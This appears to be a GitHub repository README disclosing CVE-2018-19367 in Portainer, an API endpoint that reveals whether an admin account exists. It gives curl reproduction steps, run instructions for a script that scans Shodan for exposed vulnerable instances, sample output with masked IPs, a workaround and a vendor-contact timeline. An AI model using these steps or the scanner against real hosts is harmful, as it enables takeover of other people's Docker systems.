Skip to content

This script search at shodan for portainer poorly configured and vulnerable

License

Notifications You must be signed in to change notification settings

lichti/shodan-portainer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Responsible Disclosure

Portainer - Check if admin already created by a public API endpoint

CVE

CVE-2018-19367

PRODUCT DESCRIPTION

Portainer is an open-source lightweight management UI which allows you to easily manage your Docker hosts or Swarm clusters.

BACKGROUND

  • Portainer until 1.19.2

VULNERABILITY DETAILS

Portainer provides an API endpoint (/api/users/admin/check) to verify that the admin user is already created. This API endpoint will return 404 if admin was not created and 204 if it was already created. This "feature" allows anyone to receive unauthorized access on the host when the portainer is configured incorrectly.

PROOF OF CONCEPT

Youtube demo video

Manual steps to reproduce the vulnerability:

  1. docker run --rm -it -p 9000:9000 -v /var/run/docker.sock:/var/run/docker.sock portainer/portainer
  2. curl -X GET -s -o /dev/null -w "%{http_code}" http://127.0.0.1:9000/api/users/admin/check
  3. If curl return 404, open web-browser and create a admin password. xdg-open http://127.0.0.1:9000

Applying this around the world with shodan:

git clone [email protected]:lichti/shodan-portainer.git
virtualenv --python python3 .venv
source .venv/bin/activate
pip install -r requirements.txt
export SHODAN_API_KEY=xxxxxxxxxxxxxxxxxxxxxxx
python portainer.py

If you has a paid plan, you can use a filters:

export SHODAN_FILTER = 'country:"BR"'
python portainer.py

Output example:

Country: US | ISP: Digital Ocean | http://142.x.y.158:9001/
Country: CA | ISP: Atlantic.net  | http://45.x.y.165:9000/
Error: skipping 206.x.y.63

WORKAROUND

Forcing the admin password by extra parameter on portainer CLI - configuration.html#admin-password. On source code portainer.go#L13-L14.

VULNERABILITY DISCLOSURE TIMELINE

2018-11-19: Vendor was contacted #2475

2018-11-19: Vendor response and confirm the vulnerability 2475#issuecomment-440104455

AUTHOR & REVISION

Author: Gustavo Lichti [email protected]

Revision:

About

This script search at shodan for portainer poorly configured and vulnerable

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages